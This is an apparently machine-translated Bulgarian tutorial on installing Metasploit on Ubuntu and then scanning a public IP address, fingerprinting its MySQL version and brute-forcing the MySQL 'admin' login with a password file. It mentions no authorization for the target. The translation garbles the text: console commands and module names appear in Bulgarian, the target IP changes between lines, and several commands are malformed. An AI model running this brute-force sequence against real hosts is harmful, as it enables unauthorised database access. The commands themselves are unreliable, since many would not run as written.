Съдържание
Metasploit Framework, е инструмент за разработване и изпълнение на експлойти срещу компютър или сървър. Metasploit Framework е написан на езика Ruby, той е мултиплатформен и изисква мощен компютър за работа, има платена версия и безплатна версия за общността.Тя може да бъде изтеглена на www.metasploit.com/framework/download
Ще инсталираме Linux Ubutnu, но работи за други дистрибуции чрез промяна на някои команди.
Достъпваме до прозореца на терминала и инсталираме ruby, преди да работи с perl, но беше програмиран напълно нов.
Инсталираме рубиновите зависимости, за да можем след това да стартираме рамката.
sudo apt-get install ruby libruby rdoc sudo apt-get install libyaml-ruby sudo apt-get install libzlib-ruby sudo apt-get install libopenssl-ruby sudo apt-get install libdl-ruby sudo apt-get install libreadline-ruby sudo apt -get install libiconv-ruby sudo apt-get install rubygems * sudo apt-get install libgtk2-ruby libglade2-ruby
Тогава в зависимост от версията, която изтегляме 32 или 64 бита от терминала, ще дадем разрешение:
chmod + x metasploit-latest-linux-x64-installer.run
Стартираме инсталатора и ще се отвори инсталационният прозорец:
sudo metasploit-latest-linux-x64-installer.run
В края на инсталацията от прозореца на терминала и с root достъп актуализираме рамката
с командата:
msfupdate
Metasploit е програма без графична среда, която работи напълно в терминала. Достъпваме до софтуера от терминала с командата:
msfconsole
Познаване на MSF вътрешно
MSF (Metasploit Framework) Той е структуриран в поредица от модули като:
Подвизи Какви скриптове и програми са налични в MSF и които можем да използваме, те са организирани по операционна система и категории, например експлойт / windows / браузър / които са подвизите, налични за браузъри, работещи под Windows.
Полезни товари: Действието ще бъде извършено, ако уязвимостта, която тестваме, може да бъде открита и използвана.
Спомагателни: спомагателните скриптове с различни функции, като спомагателни / скенер / портове / tcp и използвайки този скенер за tcp портове, ще получим статуса на порта. Този скрипт е алтернатива на Nmap.
Осъществява: Те кодират скрипт, за да избегнат някои антивирусни програми и антиспаммери.
Стартираме пример за тестване от терминала, който изпълняваме:./msfconsole
Ще започнем със сканиране на ip с nmap
msf> nmap -sV 190.155.80.110
Активираме помощния модул за достъп до скриптовите инструменти, които ще позволят работа върху mysql. Можем да видим и версията на модула.
msf> помощно (mysql_version)> задаване на RHOSTS 190.155.80.110 // задаване на отдалечен ip msf> задаване на RHOSTS 192.155.80.110 msf> спомагателно (mysql_version)> изпълнение // проверка на версията на mysql
Ако се изпълни правилно, може да върне версията на mysql:
[*] 190.155.80.110 работи с Mysql5.0
Друг случай с модула за сканиране и опит за промяна на основния потребител на mysql:
msf> използвайте скенер / mysql / mysql_login msf> задайте администратора на потребителя msf> задайте PASS_FILE /tmp/keys.lst // текстов файл с възможни ключове един под другия msf> експлоатирайте
Ако работи, можем да влезем в mysql:
mysql -h 1920,155,80,110 -u admin -pkey